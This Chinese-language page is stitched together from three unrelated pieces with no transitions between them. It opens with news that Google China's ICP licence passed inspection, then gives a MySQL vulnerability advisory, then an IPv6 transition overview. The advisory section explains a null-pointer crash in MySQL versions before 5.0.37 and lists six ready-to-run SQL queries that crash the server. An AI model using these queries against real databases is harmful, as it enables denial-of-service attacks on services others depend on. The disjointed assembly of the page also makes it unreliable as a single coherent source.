今日19时10分，谷歌大中华区公关总监王锦红向本报记者证实，谷歌中国ICP牌照年检已通过。

　　与此同时，Google公司总部也更新了其官方博客，确认了这一消息。Google并未新发博文，而是在6月28日首席法律官大卫•德拉蒙德发表的一篇文章文首，直接以黑体字添加内容：“我们十分高兴地得知，中国政府刚刚通过了我们ICP牌照的年检。我们可以继续为中国用户提供搜索和其他本地产品服务了”。

　　中国关于互联网管理的法规规定，互联网增值服务运营商必须申请ICP牌照(《中华人民共和国电信与信息服务业务经营许可证》)。该牌照有效期为五年，每年年检一次。

　　工信部发言人王立建曾对本报记者表示，谷歌今年的年检材料于6月底递交。

　　受影响系统：

　　MySQL AB MySQL < 5.0.37

　　不受影响系统：

　　MySQL AB MySQL 5.0.37

　　描述：

　　BUGTRAQ ID: 22900

　　MySQL是一款使用非常广泛的开放源代码关系数据库系统，拥有各种平台的运行版本。

　　MySQL在处理特定畸形请求时存在漏洞，远程攻击者可能利用此漏洞在导致MySQL进程崩溃。

　　如果MySQL用户在字符串函数中使用了子选择的话，就会调用Item_singlerow_subselect::val_str()。由于无需分类整理单行子选择的结果，因此不会初始化所分配结构st_table中的某些字段，具体来讲是sort->io_cache字段。但如果在查询中使用了ORDER BY，就会对表格运行filesort()，filesort()中的错误处理例程在引用未初始化字段值出现段访问错误：

　　libmysqld/filesort.cc:

　　111 FILESORT_INFO table_sort;

　　(...)

　　117 memcpy(&table_sort, &table->sort, sizeof(FILESORT_INFO));

　　120 outfile= table_sort.io_cache;

　　(..)

　　269 err:

　　(..)

　　276 if (my_b_inited(outfile))

　　include/my_sys.h:

　　503 #define my_b_inited(info) (info)->buffer

　　这可能会触发空指针引用，导致mysqld崩溃。

　　
　　测试方法：

　　警 告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负!

　　SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));

　　SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));

　　SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);

　　SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));

　　SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));

　　SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

　　建议：

　　厂商补丁：

　　MySQL AB

　　--------

　　厂商发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

　　http://dev.mysql.com/downloads/mysql/5.0.html#downloads

　　你知道你的IPv6是从IPv4升级而来的吗?我们想我们能够给你一些帮助。

　　IPv6是一个期待以久的互联网主要通讯协议IPv4的升级计划。IPv4使用的是32位地址，可以支持43亿个设备直接接入互联网。IPv6使用的是128位地址，几乎可以支持无限多的设备接入互联网，其支持的数量为：2的128次方。

　　IPv6备忘单

　　在将你的网络做好同时支持IPv6和IPv4准备前，你需要知道以下这些基本常识。

　　IPv6的背景

　　标准机构互联网工程任务组(Internet Engineering Task Force，IETF)在1998年提出作为IPv4替代方案的IPv6。因为随着互联网的发展，IPv4地址最终将会被用尽。

　　IPv6的主要目标是增加互联网地址数量，但是协议还增加了一些增强功能，其中包括有自动配置、更容易的网络重新编号和通过IPSec协议内嵌的安全功能。

　　虽然IPv6部署进程缓慢，但是IPv6的部署还是在2009年取得了一个里程碑。球领先的原生IPv6互联网骨干网和主机托管服务商Hurricane Electric公司和NTTAmerica(日本NTT通信公司在美国的机构)表示，他们的IPv6信息在2009年翻了一倍，同时谷歌也增加了IPv6对搜索、Docs、Gmail和新闻等多个应用的支持。

　　IPv6的推动活动在2010年仍然在继续。Comcast和Verizon公司宣布了他们对IPv6协议的首次公开测试。

美国联邦政府是IPv6的支持者。联邦政府命令所有的部门在2008年6月30日之前完成一切支持IPv6的有关工作，让他们的骨干网络有能力发送或者接受IPv6地址。在2010年7月份，《联邦采购条例》将被修改为要求所有的部门购买仅支持IPv6的IT系统。

　　专家们催促美国网络经理们在2012年前将他们的对外网站做好支持IPv6的准备，否则他们的网站与那些具备IPv6能力的访问者将处于将低等级连通状态。

　　截止至2010年3月份，专家们表示IPv6信息已经占了互联网信息总量的1%。

　　IPv4地址枯竭

　　IPv4地址枯竭这一问题自从上世纪八十年代就被注意到了。尽管一种替代IPv4的技术已经被研发出来，但是互联网工程师们在当时还是找到了几种能够保持互联网基于IPv4继续增长的技术。

　　这些技术包括可将私人网络地址隐藏在一个单一的公共IPv4地址后面的网络地址转换(NAT)技术和可更为有效分配和路由IP地址段的无类别域间路由(CIDR)。CIDR和NAT技术的应用使得互联网工程协会推迟了将互联网基础设施由IPv4升级至IPv6的进程。

　　目前运营商和企业正在逐渐向IPv6升级。地区性互联网注册机构(RIR)在2010年4月份表示，目前尚未分发出去的IPv4地址数量已经低于8%。

　　专家预测IPv4地址空间将在2011年或2012年被用尽。

　　IPv6过渡方案

　　互联网工程协会已经部署了多个过渡方案，这些过渡方案将帮助网络使用者逐渐由IPv4向IPv6迁移。

　　其中一个方案被称之为“双堆栈”机制，其允许网络使用者在他们的网络中同时使用IPv4和IPv6。

　　另一个方案被称之为运营商级网络地址转换(CGN)，其允许多客户共享一个单一的公共IPv4地址。

　　第三个方案被称为“6rd”。该方案已经被法国ISP运营商Free所使用。法国ISP运营商Free通过在基于IPv4 骨干网络的传输中封装IPv6数据包快速地向家庭用户部署了IPv6。

　　最终用户可以在多种隧道技术中做出选择。这些隧道技术包括“6to4技术”、“Teredo技术”和“ISATAP技术”。虽然这些隧道技术均可以将IPv4网络中传输IPv6数据包，但是这些技术也存在安全方面的疑虑。